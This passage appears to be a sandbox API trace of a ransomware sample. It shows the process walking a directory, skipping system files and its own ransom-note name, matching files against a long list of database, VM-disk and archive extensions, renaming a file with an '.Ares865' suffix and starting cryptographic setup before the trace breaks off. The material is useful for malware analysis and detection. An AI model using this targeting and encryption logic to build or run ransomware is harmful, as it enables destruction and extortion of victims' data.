dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.375] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.375] CloseHandle (hObject=0x15c) returned 1 [0089.375] CloseHandle (hObject=0x118) returned 1 [0089.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.375] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2ca5b43, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2ca5b43, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c10f535, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pictures.ico", cAlternateFileName="")) returned 1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2="aoldtz.exe") returned 1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2=".") returned 1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2="..") returned 1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2="windows") returned -1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2="bootmgr") returned 1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2="temp") returned -1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2="pagefile.sys") returned 1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2="boot") returned 1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2="ids.txt") returned 1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2="ntuser.dat") returned 1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2="perflogs") returned 1 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2="MSBuild") returned 1 [0089.376] lstrlenW (lpString="pictures.ico") returned 12 [0089.376] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 96 [0089.376] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="pictures.ico" | out: lpString1="pictures.ico") returned="pictures.ico" [0089.376] lstrlenW (lpString="pictures.ico") returned 12 [0089.376] lstrlenW (lpString="Ares865") returned 7 [0089.376] lstrcmpiW (lpString1="res.ico", lpString2="Ares865") returned 1 [0089.376] lstrlenW (lpString=".dll") returned 4 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2=".dll") returned 1 [0089.376] lstrlenW (lpString=".lnk") returned 4 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2=".lnk") returned 1 [0089.376] lstrlenW (lpString=".ini") returned 4 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2=".ini") returned 1 [0089.376] lstrlenW (lpString=".sys") returned 4 [0089.376] lstrcmpiW (lpString1="pictures.ico", lpString2=".sys") returned 1 [0089.376] lstrlenW (lpString="pictures.ico") returned 12 [0089.376] lstrlenW (lpString="bak") returned 3 [0089.376] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.376] lstrlenW (lpString="ba_") returned 3 [0089.376] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.376] lstrlenW (lpString="dbb") returned 3 [0089.376] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.376] lstrlenW (lpString="vmdk") returned 4 [0089.376] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.376] lstrlenW (lpString="rar") returned 3 [0089.377] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.377] lstrlenW (lpString="zip") returned 3 [0089.377] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.377] lstrlenW (lpString="tgz") returned 3 [0089.377] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.377] lstrlenW (lpString="vbox") returned 4 [0089.377] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.377] lstrlenW (lpString="vdi") returned 3 [0089.377] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.377] lstrlenW (lpString="vhd") returned 3 [0089.377] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.377] lstrlenW (lpString="vhdx") returned 4 [0089.377] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.377] lstrlenW (lpString="avhd") returned 4 [0089.377] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.377] lstrlenW (lpString="db") returned 2 [0089.377] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.377] lstrlenW (lpString="db2") returned 3 [0089.377] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.377] lstrlenW (lpString="db3") returned 3 [0089.377] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.377] lstrlenW (lpString="dbf") returned 3 [0089.377] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.377] lstrlenW (lpString="mdf") returned 3 [0089.377] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.377] lstrlenW (lpString="mdb") returned 3 [0089.377] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.377] lstrlenW (lpString="sql") returned 3 [0089.377] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.377] lstrlenW (lpString="sqlite") returned 6 [0089.377] lstrcmpiW (lpString1="es.ico", lpString2="sqlite") returned -1 [0089.377] lstrlenW (lpString="sqlite3") returned 7 [0089.377] lstrcmpiW (lpString1="res.ico", lpString2="sqlite3") returned -1 [0089.377] lstrlenW (lpString="sqlitedb") returned 8 [0089.377] lstrcmpiW (lpString1="ures.ico", lpString2="sqlitedb") returned 1 [0089.377] lstrlenW (lpString="xml") returned 3 [0089.377] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.377] lstrlenW (lpString="$er") returned 3 [0089.378] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.378] lstrlenW (lpString="4dd") returned 3 [0089.378] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.378] lstrlenW (lpString="4dl") returned 3 [0089.378] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.378] lstrlenW (lpString="^^^") returned 3 [0089.378] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.378] lstrlenW (lpString="abs") returned 3 [0089.378] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.378] lstrlenW (lpString="abx") returned 3 [0089.378] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.378] lstrlenW (lpString="accdb") returned 5 [0089.378] lstrcmpiW (lpString1="s.ico", lpString2="accdb") returned 1 [0089.378] lstrlenW (lpString="accdc") returned 5 [0089.378] lstrcmpiW (lpString1="s.ico", lpString2="accdc") returned 1 [0089.378] lstrlenW (lpString="accde") returned 5 [0089.378] lstrcmpiW (lpString1="s.ico", lpString2="accde") returned 1 [0089.378] lstrlenW (lpString="accdr") returned 5 [0089.378] lstrcmpiW (lpString1="s.ico", lpString2="accdr") returned 1 [0089.378] lstrlenW (lpString="accdt") returned 5 [0089.378] lstrcmpiW (lpString1="s.ico", lpString2="accdt") returned 1 [0089.378] lstrlenW (lpString="accdw") returned 5 [0089.378] lstrcmpiW (lpString1="s.ico", lpString2="accdw") returned 1 [0089.378] lstrlenW (lpString="accft") returned 5 [0089.378] lstrcmpiW (lpString1="s.ico", lpString2="accft") returned 1 [0089.378] lstrlenW (lpString="adb") returned 3 [0089.378] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.378] lstrlenW (lpString="adb") returned 3 [0089.378] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.378] lstrlenW (lpString="ade") returned 3 [0089.378] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.378] lstrlenW (lpString="adf") returned 3 [0089.378] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.378] lstrlenW (lpString="adn") returned 3 [0089.378] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.378] lstrlenW (lpString="adp") returned 3 [0089.378] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.379] lstrlenW (lpString="alf") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.379] lstrlenW (lpString="ask") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.379] lstrlenW (lpString="btr") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.379] lstrlenW (lpString="cat") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.379] lstrlenW (lpString="cdb") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.379] lstrlenW (lpString="ckp") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.379] lstrlenW (lpString="cma") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.379] lstrlenW (lpString="cpd") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.379] lstrlenW (lpString="dacpac") returned 6 [0089.379] lstrcmpiW (lpString1="es.ico", lpString2="dacpac") returned 1 [0089.379] lstrlenW (lpString="dad") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.379] lstrlenW (lpString="dadiagrams") returned 10 [0089.379] lstrcmpiW (lpString1="ctures.ico", lpString2="dadiagrams") returned -1 [0089.379] lstrlenW (lpString="daschema") returned 8 [0089.379] lstrcmpiW (lpString1="ures.ico", lpString2="daschema") returned 1 [0089.379] lstrlenW (lpString="db-journal") returned 10 [0089.379] lstrcmpiW (lpString1="ctures.ico", lpString2="db-journal") returned -1 [0089.379] lstrlenW (lpString="db-shm") returned 6 [0089.379] lstrcmpiW (lpString1="es.ico", lpString2="db-shm") returned 1 [0089.379] lstrlenW (lpString="db-wal") returned 6 [0089.379] lstrcmpiW (lpString1="es.ico", lpString2="db-wal") returned 1 [0089.379] lstrlenW (lpString="dbc") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.379] lstrlenW (lpString="dbs") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.379] lstrlenW (lpString="dbt") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.379] lstrlenW (lpString="dbv") returned 3 [0089.379] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.379] lstrlenW (lpString="dbx") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.380] lstrlenW (lpString="dcb") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.380] lstrlenW (lpString="dct") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.380] lstrlenW (lpString="dcx") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.380] lstrlenW (lpString="ddl") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.380] lstrlenW (lpString="dlis") returned 4 [0089.380] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.380] lstrlenW (lpString="dp1") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.380] lstrlenW (lpString="dqy") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.380] lstrlenW (lpString="dsk") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.380] lstrlenW (lpString="dsn") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.380] lstrlenW (lpString="dtsx") returned 4 [0089.380] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.380] lstrlenW (lpString="dxl") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.380] lstrlenW (lpString="eco") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.380] lstrlenW (lpString="ecx") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.380] lstrlenW (lpString="edb") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.380] lstrlenW (lpString="epim") returned 4 [0089.380] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.380] lstrlenW (lpString="fcd") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.380] lstrlenW (lpString="fdb") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.380] lstrlenW (lpString="fic") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.380] lstrlenW (lpString="flexolibrary") returned 12 [0089.380] lstrlenW (lpString="fm5") returned 3 [0089.380] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.381] lstrlenW (lpString="fmp") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.381] lstrlenW (lpString="fmp12") returned 5 [0089.381] lstrcmpiW (lpString1="s.ico", lpString2="fmp12") returned 1 [0089.381] lstrlenW (lpString="fmpsl") returned 5 [0089.381] lstrcmpiW (lpString1="s.ico", lpString2="fmpsl") returned 1 [0089.381] lstrlenW (lpString="fol") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.381] lstrlenW (lpString="fp3") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.381] lstrlenW (lpString="fp4") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.381] lstrlenW (lpString="fp5") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.381] lstrlenW (lpString="fp7") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.381] lstrlenW (lpString="fpt") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.381] lstrlenW (lpString="frm") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.381] lstrlenW (lpString="gdb") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.381] lstrlenW (lpString="gdb") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.381] lstrlenW (lpString="grdb") returned 4 [0089.381] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.381] lstrlenW (lpString="gwi") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.381] lstrlenW (lpString="hdb") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.381] lstrlenW (lpString="his") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.381] lstrlenW (lpString="ib") returned 2 [0089.381] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.381] lstrlenW (lpString="idb") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.381] lstrlenW (lpString="ihx") returned 3 [0089.381] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.381] lstrlenW (lpString="itdb") returned 4 [0089.382] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.382] lstrlenW (lpString="itw") returned 3 [0089.382] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.382] lstrlenW (lpString="jet") returned 3 [0089.382] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.382] lstrlenW (lpString="jtx") returned 3 [0089.382] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.382] lstrlenW (lpString="kdb") returned 3 [0089.382] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.382] lstrlenW (lpString="kexi") returned 4 [0089.382] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.382] lstrlenW (lpString="kexic") returned 5 [0089.382] lstrcmpiW (lpString1="s.ico", lpString2="kexic") returned 1 [0089.382] lstrlenW (lpString="kexis") returned 5 [0089.382] lstrcmpiW (lpString1="s.ico", lpString2="kexis") returned 1 [0089.382] lstrlenW (lpString="lgc") returned 3 [0089.382] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.382] lstrlenW (lpString="lwx") returned 3 [0089.382] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.382] lstrlenW (lpString="maf") returned 3 [0089.382] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.382] lstrlenW (lpString="maq") returned 3 [0089.382] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.382] lstrlenW (lpString="mar") returned 3 [0089.382] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.382] lstrlenW (lpString="marshal") returned 7 [0089.382] lstrcmpiW (lpString1="res.ico", lpString2="marshal") returned 1 [0089.382] lstrlenW (lpString="mas") returned 3 [0089.382] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.382] lstrlenW (lpString="mav") returned 3 [0089.382] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.383] lstrlenW (lpString="maw") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.383] lstrlenW (lpString="mdbhtml") returned 7 [0089.383] lstrcmpiW (lpString1="res.ico", lpString2="mdbhtml") returned 1 [0089.383] lstrlenW (lpString="mdn") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.383] lstrlenW (lpString="mdt") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.383] lstrlenW (lpString="mfd") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.383] lstrlenW (lpString="mpd") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.383] lstrlenW (lpString="mrg") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.383] lstrlenW (lpString="mud") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.383] lstrlenW (lpString="mwb") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.383] lstrlenW (lpString="myd") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.383] lstrlenW (lpString="ndf") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.383] lstrlenW (lpString="nnt") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.383] lstrlenW (lpString="nrmlib") returned 6 [0089.383] lstrcmpiW (lpString1="es.ico", lpString2="nrmlib") returned -1 [0089.383] lstrlenW (lpString="ns2") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.383] lstrlenW (lpString="ns3") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.383] lstrlenW (lpString="ns4") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.383] lstrlenW (lpString="nsf") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.383] lstrlenW (lpString="nv") returned 2 [0089.383] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.383] lstrlenW (lpString="nv2") returned 3 [0089.383] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.384] lstrlenW (lpString="nwdb") returned 4 [0089.384] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.384] lstrlenW (lpString="nyf") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.384] lstrlenW (lpString="odb") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.384] lstrlenW (lpString="odb") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.384] lstrlenW (lpString="oqy") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.384] lstrlenW (lpString="ora") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.384] lstrlenW (lpString="orx") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.384] lstrlenW (lpString="owc") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.384] lstrlenW (lpString="p96") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.384] lstrlenW (lpString="p97") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.384] lstrlenW (lpString="pan") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.384] lstrlenW (lpString="pdb") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.384] lstrlenW (lpString="pdm") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.384] lstrlenW (lpString="pnz") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.384] lstrlenW (lpString="qry") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.384] lstrlenW (lpString="qvd") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.384] lstrlenW (lpString="rbf") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.384] lstrlenW (lpString="rctd") returned 4 [0089.384] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.384] lstrlenW (lpString="rod") returned 3 [0089.384] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.384] lstrlenW (lpString="rodx") returned 4 [0089.385] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.385] lstrlenW (lpString="rpd") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.385] lstrlenW (lpString="rsd") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.385] lstrlenW (lpString="sas7bdat") returned 8 [0089.385] lstrcmpiW (lpString1="ures.ico", lpString2="sas7bdat") returned 1 [0089.385] lstrlenW (lpString="sbf") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.385] lstrlenW (lpString="scx") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.385] lstrlenW (lpString="sdb") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.385] lstrlenW (lpString="sdc") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.385] lstrlenW (lpString="sdf") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.385] lstrlenW (lpString="sis") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.385] lstrlenW (lpString="spq") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.385] lstrlenW (lpString="te") returned 2 [0089.385] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.385] lstrlenW (lpString="teacher") returned 7 [0089.385] lstrcmpiW (lpString1="res.ico", lpString2="teacher") returned -1 [0089.385] lstrlenW (lpString="tmd") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.385] lstrlenW (lpString="tps") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.385] lstrlenW (lpString="trc") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.385] lstrlenW (lpString="trc") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.385] lstrlenW (lpString="trm") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.385] lstrlenW (lpString="udb") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.385] lstrlenW (lpString="udl") returned 3 [0089.385] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.386] lstrlenW (lpString="usr") returned 3 [0089.386] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.386] lstrlenW (lpString="v12") returned 3 [0089.386] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.386] lstrlenW (lpString="vis") returned 3 [0089.386] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.386] lstrlenW (lpString="vpd") returned 3 [0089.386] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.386] lstrlenW (lpString="vvv") returned 3 [0089.386] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.386] lstrlenW (lpString="wdb") returned 3 [0089.386] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.386] lstrlenW (lpString="wmdb") returned 4 [0089.386] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.386] lstrlenW (lpString="wrk") returned 3 [0089.386] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.386] lstrlenW (lpString="xdb") returned 3 [0089.386] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.386] lstrlenW (lpString="xld") returned 3 [0089.386] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.386] lstrlenW (lpString="xmlff") returned 5 [0089.386] lstrcmpiW (lpString1="s.ico", lpString2="xmlff") returned -1 [0089.386] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.Ares865") returned 106 [0089.386] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.ares865"), dwFlags=0x1) returned 1 [0089.387] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.387] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=83560) returned 1 [0089.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.388] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.388] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.388] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.388] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14970, lpName=0x0) returned 0x15c [0089.390] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14970) returned 0x190000 [0089.395] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 